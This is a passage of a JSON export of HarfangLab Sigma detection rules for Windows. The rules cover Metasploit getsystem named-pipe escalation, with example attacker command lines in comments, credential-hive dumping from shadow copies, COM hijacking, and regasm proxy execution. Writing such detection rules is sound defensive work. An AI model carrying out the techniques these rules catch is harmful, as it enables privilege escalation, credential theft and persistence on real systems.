"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077208Z",
"creation_date": "2026-03-23T11:45:34.077210Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077214Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.rapid7.com/metasploit/meterpreter-getsystem/",
"https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70",
"https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c",
"https://attack.mitre.org/techniques/T1134/001/"
],
"name": "t1134_001_metasploit_get_system.yml",
"content": "title: Metasploit Get SYSTEM Command Detected\nid: 02ce0f33-c820-4f8d-8af4-6118aa5e0f86\ndescription: |\n Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\n Metasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\n Metasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\n It is recommended to investigate other malicious actions taken by the detected process and its ancestors.\nreferences:\n - https://docs.rapid7.com/metasploit/meterpreter-getsystem/\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/elevate.c#L70\n - https://github.com/rapid7/metasploit-payloads/blob/master/c/meterpreter/source/extensions/priv/namedpipe.c\n - https://attack.mitre.org/techniques/T1134/001/\ndate: 2022/02/14\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1134.001\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Metasploit\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_services:\n ParentImage|endswith: '\\services.exe'\n\n selection_variant_cmd:\n # cmd.exe /c echo lddocl > \\\\.\\pipe\\lddocl\n Image|endswith: '\\cmd.exe'\n CommandLine|endswith: '/c echo ?????? > \\\\\\\\.\\\\pipe\\\\??????'\n\n selection_variant_rundll32:\n # rundll32.exe C:\\Windows\\TEMP\\lddocl.dll,a /p:lddocl\n Image|endswith: '\\rundll32.exe'\n CommandLine|endswith: '??????.dll,a /p:??????'\n\n condition: selection_services and 1 of selection_variant_*\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02ce0f33-c820-4f8d-8af4-6118aa5e0f86",
"rule_name": "Metasploit Get SYSTEM Command Detected",
"rule_description": "Detects a suspicious attempt to elevate privilege to local SYSTEM via the Metasploit Framework.\nMetasploit is a penetration testing framework used for exploiting vulnerabilities, gaining unauthorized access, performing privilege escalation, and conducting post-exploitation activities.\nMetasploit spawns a service to elevate from local Admin to local SYSTEM via Named Pipe Impersonation.\nIt is recommended to investigate other malicious actions taken by the detected process and its ancestors.\n",
"rule_creation_date": "2022-02-14",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1134.001",
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079579Z",
"creation_date": "2026-03-23T11:45:34.079581Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079586Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/002/",
"https://attack.mitre.org/techniques/T1003/004/"
],
"name": "t1003_registry_extract_shadowcopy.yml",
"content": "title: Sensitive Registry Hive Dumped from Volume Shadow Copy\nid: 02fc96b9-8da8-4b40-8a75-557d9c2f79d3\ndescription: |\n Detects file accesses to registry hives saved inside a Volume Shadow Copy.\n Attackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\n This can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\n It is recommended to investigate the process trying to access the hives for malicious contents.\nreferences:\n - https://attack.mitre.org/techniques/T1003/002/\n - https://attack.mitre.org/techniques/T1003/004/\ndate: 2023/06/26\nmodified: 2025/10/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003\n - attack.t1003.002\n - attack.t1003.004\n - classification.Windows.Source.ShadowCopy\n - classification.Windows.Behavior.VolumeShadowCopy\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: filesystem_shadowcopy\n product: windows\ndetection:\n selection:\n Path|endswith:\n - '\\Windows\\System32\\config\\SYSTEM'\n - '\\Windows\\System32\\config\\SAM'\n - '\\Windows\\System32\\config\\SECURITY'\n - '\\Windows\\System32\\config\\RegBack\\SYSTEM'\n - '\\Windows\\System32\\config\\RegBack\\SAM'\n - '\\Windows\\System32\\config\\RegBack\\SECURITY'\n # - '\\Windows\\System32\\config\\SOFTWARE' # too many FP\n\n selection_remote_system:\n # Impacket's secretsdump used with the option -use-remoteSSMethod.\n ProcessName: 'system'\n ProcessId: '4'\n SessionLogonType: 3\n\n exclusion_known_fp_win7:\n # seems to happen on win7 and 2008\n CreateOptionsStr:\n - 'FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0140 / FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n - 'FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED' # 0x0160 FILE_SYNCHRONOUS_IO_NONALERT|FILE_NON_DIRECTORY_FILE|FILE_COMPLETE_IF_OPLOCKED\n 
CreateDispositionStr: 'FILE_OPEN' # 0x01 / FILE_OPEN\n\n exclusion_restore_point_creation:\n ProcessCommandLine:\n - '?:\\windows\\system32\\srtasks.exe ExecuteScheduledSPPCreation'\n - '?:\\windows\\system32\\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_wbengine:\n ProcessImage: '?:\\Windows\\System32\\wbengine.exe'\n\n exclusion_lsass:\n ProcessImage: '?:\\Windows\\System32\\lsass.exe'\n\n exclusion_vssvc:\n ProcessImage: '?:\\Windows\\system32\\vssvc.exe'\n\n exclusion_defender:\n ProcessImage:\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe'\n - '?:\\Program Files\\Windows Defender\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\platform\\\\*\\MsMpEng.exe'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MpDlpService.exe'\n\n # another specific rule for this\n exclusion_ntdsutil:\n ProcessImage: '?:\\Windows\\System32\\ntdsutil.exe'\n\n exclusion_trusted_installer:\n ProcessImage: '?:\\Windows\\servicing\\TrustedInstaller.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_sdrsvc:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\svchost.exe -k SDRSVC'\n\n exclusion_rstrui:\n ProcessImage: '?:\\Windows\\system32\\rstrui.exe'\n\n exclusion_recoverydrive:\n # Recovery Media Creator\n ProcessImage: '?:\\Windows\\System32\\RecoveryDrive.exe'\n\n exclusion_search_protocolhost:\n ProcessImage: '?:\\Windows\\System32\\SearchProtocolHost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\SearchIndexer.exe'\n\n exclusion_igfxcui:\n ProcessGrandparentImage: '?:\\Windows\\system32\\igfxCUIService.exe'\n ProcessImage: '?:\\Windows\\System32\\igfxEM.exe'\n\n exclusion_cobian:\n ProcessImage|endswith:\n - '\\Cobian Backup 1?\\cbVSCService1?.exe'\n - '\\Cobian Backup ??\\cbVSCService.exe'\n - '\\Cobian Backup ??\\cbService.exe'\n - 
'\\CobianBackup\\cbVSCService1?.exe'\n - '\\CobianBackup\\cbVSCService.exe'\n\n exclusion_commvault:\n # For an unknown reason the file has a valid signature but we say it is unsigned...\n ProcessImage|endswith:\n - '\\Commvault\\ContentStore\\Base\\cvd.exe'\n - '\\Commvault\\Base\\CLBackup.exe'\n - '\\Commvault\\ContentStore\\Base\\CLBackup.exe'\n ProcessSignature: 'Commvault Systems, Inc.'\n\n exclusion_dell:\n ProcessDescription: 'Avamar Backup Client'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Dell Technologies Inc.'\n - 'EMC Corporation'\n\n condition: selection and ((not 1 of exclusion_*) or selection_remote_system)\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "02fc96b9-8da8-4b40-8a75-557d9c2f79d3",
"rule_name": "Sensitive Registry Hive Dumped from Volume Shadow Copy",
"rule_description": "Detects file accesses to registry hives saved inside a Volume Shadow Copy.\nAttackers can use Shadow Copy Volumes to access files that would normally be protected from access by the system.\nThis can be indicative of an attempt to access sensitive information stored in registry hives (such as the SAM or the LSA secrets) for credential access.\nIt is recommended to investigate the process trying to access the hives for malicious contents.\n",
"rule_creation_date": "2023-06-26",
"rule_modified_date": "2025-10-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003",
"attack.t1003.002",
"attack.t1003.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "032b28af-b4ce-4476-a201-8b2896158878",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623666Z",
"creation_date": "2026-03-23T11:45:34.623668Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623672Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html",
"https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/",
"https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/",
"https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/",
"https://github.com/eset/malware-ioc/blob/master/turla/README.adoc",
"https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_component_object_model_hijacking.yml",
"content": "title: Possible Component Object Model Hijacking\nid: 032b28af-b4ce-4476-a201-8b2896158878\ndescription: |\n Detects the possible hijacking of a Component Object Model (COM) in the registry.\n Attackers can use this method to achieve persistence through an event trigger execution.\n The DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\n It is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\nreferences:\n - https://www.trellix.com/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html\n - https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/\n - https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/\n - https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n - https://github.com/eset/malware-ioc/blob/master/turla/README.adoc\n - https://www.proofpoint.com/us/blog/threat-insight/10-things-i-hate-about-attribution-romcom-vs-transferloader\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2022/09/29\nmodified: 2026/02/02\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.015\n - attack.execution\n - attack.t1559.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Hijacking\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n\n selection_ehstorshell:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\\InprocServer32\\(Default)'\n filter_ehstorshell:\n Details: '?:\\Windows\\System32\\EhStorShell.dll'\n\n selection_wmiutils:\n TargetObject:\n 
- 'HKLM\\SOFTWARE\\Classes\\CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)' # WbemDefaultPathParser\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EAC8A024-21E2-4523-AD73-A71A0AA2F56A}\\InprocServer32\\(Default)' # WbemQuery\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\\InprocServer32\\(Default)' # WbemStatusCode\n filter_wmiutils:\n Details: '%systemroot%\\system32\\wbem\\wmiutils.dll'\n\n selection_wmiprvsd:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4DE225BF-CF59-4CFC-85F7-68B90F185355}\\InprocServer32\\(Default)'\n filter_wmiprvsd:\n Details: '%systemroot%\\system32\\wbem\\wmiprvsd.dll'\n\n selection_wbemsvc:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemsvc:\n Details: '%systemroot%\\system32\\wbem\\wbemsvc.dll'\n\n selection_wbemprox:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4590F811-1D3A-11D0-891F-00AA004B2E24}\\InprocServer32\\(Default)'\n filter_wbemprox:\n Details: '%systemroot%\\system32\\wbem\\wbemprox.dll'\n\n selection_applicationframe:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{DDC05A5A-351A-4E06-8EAF-54EC1BC2DCEA}\\InprocServer32\\(Default)'\n filter_applicationframe:\n Details: '%systemroot%\\system32\\applicationframe.dll'\n\n selection_propsys:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\\InprocServer32\\(Default)'\n filter_propsys:\n Details: '%systemroot%\\system32\\propsys.dll'\n\n selection_actioncenter:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{F56F6FDD-AA9D-4618-A949-C1B91AF43B1A}\\InprocServer32\\(Default)'\n filter_actioncenter:\n Details: '%systemroot%\\system32\\actioncenter.dll'\n\n selection_thumbcache:\n TargetObject: 'HKCU\\SOFTWARE\\Classes\\CLSID\\{2155fee3-2419-4373-b102-6843707eb41f}\\InprocServer32\\(Default)'\n filter_thumbcache:\n Details: '%systemroot%\\system32\\thumbcache.dll'\n\n selection_syncreg:\n TargetObject: 
'HKCU\\SOFTWARE\\Classes\\CLSID\\{f82b4ef1-93a9-4dde-8015-f7950a1a6e31}\\InprocServer32\\(Default)'\n filter_syncreg:\n Details: '%systemroot%\\system32\\syncreg.dll'\n\n selection_repdrvfs:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{7998DC37-D3FE-487C-A60A-7701FCC70CC6}\\InprocServer32\\(Default)'\n filter_repdrvfs:\n Details: '?:\\Windows\\system32\\wbem\\repdrvfs.dll'\n\n selection_psfactorybuffer:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\\InprocServer32\\(Default)'\n - 'HKLM\\SOFTWARE\\Classes\\CLSID\\{1293C733-3151-48F5-89DE-2457B4AB3FD2}\\InprocServer32\\(Default)'\n filter_psfactorybuffer:\n Details:\n - '?:\\Windows\\System32\\npmproxy.dll'\n - '?:\\Windows\\System32\\daxexec.dll'\n\n selection_sharetaskscheduler:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\\InprocServer32\\(Default)'\n filter_sharetaskscheduler:\n Details: '?:\\Windows\\system32\\windows.storage.dll'\n\n selection_sharingprivate:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{08244EE6-92F0-47F2-9FC9-929BAA2E7235}\\InprocServer32\\(Default)'\n filter_sharingprivate:\n Details: '?:\\Windows\\System32\\ntshrui.dll'\n\n selection_eventsystem:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{4E14FBA2-2E22-11D1-9964-00C04FBBB345}\\InprocServer32\\(Default)'\n filter_eventsystem:\n Details: '?:\\Windows\\system32\\es.dll'\n\n selection_msaa:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}\\InprocServer32\\(Default)'\n filter_msaa:\n Details: '?:\\Windows\\System32\\oleacc.dll'\n\n selection_autoplay:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{9207D8C7-E7C8-412E-87F8-2E61171BD291}\\InprocServer32\\(Default)'\n filter_autoplay:\n Details: '?:\\Windows\\system32\\shell32.dll'\n\n selection_notificationmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{A3B3C46C-05D8-429B-BF66-87068B4CE563}\\InprocServer32\\(Default)'\n 
filter_notificationmanager:\n Details: '?:\\Windows\\System32\\actioncenter.dll'\n\n selection_commonplaces:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{0997898B-0713-11D2-A4AA-00C04F8EEB3E}\\InprocServer32\\(Default)'\n filter_commonplaces:\n Details: '?:\\Windows\\System32\\windows.storage.dll'\n\n selection_identitystore:\n TargetObject: 'HKLM\\SOFTWARE\\Classes\\CLSID\\{30d49246-d217-465f-b00b-ac9ddd652eb7}\\InprocServer32\\(Default)'\n filter_identitystore:\n Details: '?:\\Windows\\System32\\IDStore.dll'\n\n selection_unexpectedshutdownreason:\n TargetObject|endswith: '\\CLSID\\{68DDBB56-9D1D-4FD9-89C5-C0DA2A625392}\\InProcServer32\\(Default)'\n filter_unexpectedshutdownreason:\n Details: '%SystemRoot%\\system32\\stobject.dll'\n\n selection_printers:\n TargetObject|endswith: '\\CLSID\\{2227A280-3AEA-1069-A2DE-08002B30309D}\\InProcServer32\\(Default)'\n filter_printers:\n Details: '%SystemRoot%\\system32\\prnfldr.dll'\n\n condition: selection and (\n (selection_ehstorshell and not filter_ehstorshell) or\n (selection_wmiutils and not filter_wmiutils) or\n (selection_wmiprvsd and not filter_wmiprvsd) or\n (selection_wbemsvc and not filter_wbemsvc) or\n (selection_wbemprox and not filter_wbemprox) or\n (selection_applicationframe and not filter_applicationframe) or\n (selection_propsys and not filter_propsys) or\n (selection_actioncenter and not filter_actioncenter) or\n (selection_thumbcache and not filter_thumbcache) or\n (selection_syncreg and not filter_syncreg) or\n (selection_repdrvfs and not filter_repdrvfs) or\n (selection_psfactorybuffer and not filter_psfactorybuffer) or\n (selection_sharetaskscheduler and not filter_sharetaskscheduler) or\n (selection_sharingprivate and not filter_sharingprivate) or\n (selection_eventsystem and not filter_eventsystem) or\n (selection_msaa and not filter_msaa) or\n (selection_autoplay and not filter_autoplay) or\n (selection_notificationmanager and not filter_notificationmanager) or\n (selection_commonplaces and 
not filter_commonplaces) or\n (selection_identitystore and not filter_identitystore) or\n (selection_unexpectedshutdownreason and not filter_unexpectedshutdownreason) or\n (selection_printers and not filter_printers)\n )\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "032b28af-b4ce-4476-a201-8b2896158878",
"rule_name": "Possible Component Object Model Hijacking",
"rule_description": "Detects the possible hijacking of a Component Object Model (COM) in the registry.\nAttackers can use this method to achieve persistence through an event trigger execution.\nThe DLL indicated in the hijacked registry key is then loaded when the corresponding COM is called by the system.\nIt is recommended to analyze the specified DLL for malicious content and the process making the registry modification for any other suspicious actions.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2026-02-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.015",
"attack.t1559.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0363e1f9-7a85-414e-a37a-5ce7993e7db4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080770Z",
"creation_date": "2026-03-23T11:45:34.080773Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080777Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Regasm/",
"https://attack.mitre.org/techniques/T1218/009/"
],
"name": "t1218_009_regasm_dll_load.yml",
"content": "title: Suspicious Proxy Execution via regasm.exe\nid: 0363e1f9-7a85-414e-a37a-5ce7993e7db4\ndescription: |\n Detects the execution of the legitimate Windows binary RegAsm.exe, used to register .NET COM assemblies.\n This may be used by attackers to load their .DLL files. By default, RegAsm calls the DLL's exported \"[Un]RegisterClass\" function.\n AWL (Application Whitelist) is a list of applications and application components that are authorized for use in an organization.\n Application whitelisting technologies use whitelists to control which applications are permitted to execute on a host.\n This can also be used by program installers in Windows.\n It is recommended to analyze the parent process as well as actions taken by RegAsm.exe to determine the legitimacy of this action.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Regasm/\n - https://attack.mitre.org/techniques/T1218/009/\ndate: 2023/01/04\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.009\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regasm\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\regasm.exe'\n OriginalFileName: 'regasm.exe'\n\n filter_directory:\n CommandLine|contains:\n - ' ?:\\Program Files\\'\n - ' ?:\\Program Files (x86)\\'\n - ' ?:\\PROGRA~2\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\'\n - ' ?:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\'\n\n exclusion_pdf_creator:\n ParentCommandLine|contains: 'PDFCreator-*_*_*-setup.tmp'\n\n exclusion_installers:\n ParentImage|endswith: '\\MsiExec.exe'\n ParentCommandLine|contains:\n - '-Embedding'\n - '/V'\n - '-V'\n CommandLine|contains:\n # SOLIDWORKS 3D Modelling\n - '?:\\ProgramData\\SOLIDWORKS\\SOLIDWORKS CAM\\MATLIBx64\\ '\n # Microsoft CCM\n - 
'Microsoft.ConfigurationManagement.SensorFramework.dll'\n - 'Microsoft.ConfigurationManager.SensorManagedProvider.dll'\n # Altova Script Editor\n - 'AltovaScriptFormEditorHost*.dll'\n # Oskab 3D\n - 'Oskab3D.SDB.dll'\n # MicroStrategy Office Plugin\n - '/tlb:moimain.tlb moimain.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\Tekla.Structures.Model\\\\*\\Tekla.Structures.Model.dll'\n - 'regasm.exe /nologo /tlb ?:\\WINDOWS\\\\Microsoft.NET\\assembly\\gac_MSIL\\tekla.structures\\\\*\\tekla.structures.dll'\n - '?:\\programdata\\service advisor\\cal\\connectivity applications\\support\\regasm.exe*'\n - '?:\\program files\\bruker\\nanoscopeanalysis\\regasm.exe /s nanoscopeanalysis.exe /tlb:hostapplication.tlb'\n - '?:\\program files (x86)\\bl\\bl\\\\*\\\\*\\regasm.exe*'\n - '*\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\regasm.exe *\\siga.softwareactivation\\dev\\siga.softwareactivation.application\\siga.softwareactivation.comwrapperspw\\bin\\release\\siga.softwareactivation.comwrapperspw.???'\n - '*\\regasm.exe /codebase *\\smsappl\\assemblies\\observationmetier.dll'\n - '?:\\users\\\\*\\temp\\is-*.tmp\\regasm.exe /s /* /tlb ?:\\users\\\\*\\temp\\is-*.tmp\\innosetuptools.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\intunecontentmanager\\microsoft.configurationmanager.intunecontentmanager.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.azuremanagement.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.cloudbase.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase bullzip.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase contextmenuhandler64.dll'\n - 
'?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase ie11cloudmetering.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe /codebase pdf7.pdfwriter*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe ?:\\windows\\system32\\dolbyaposvc\\dax3apidll.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\contentstore\\base*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe datev.crystalreports.x64bridge.dll /tlb /nologo'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanager.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\microsoft.configurationmanagement.*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsusmsp.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\bin\\x64\\wsyncact.dll'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\sms_srsrp\\srsserver.dll /unregister'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\commvault\\base\\\\*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe edisys.iulm.*.dll*'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe *\\esprit.agievision_pages.dll /codebase'\n - '?:\\windows\\microsoft.net\\framework64\\\\*\\regasm.exe 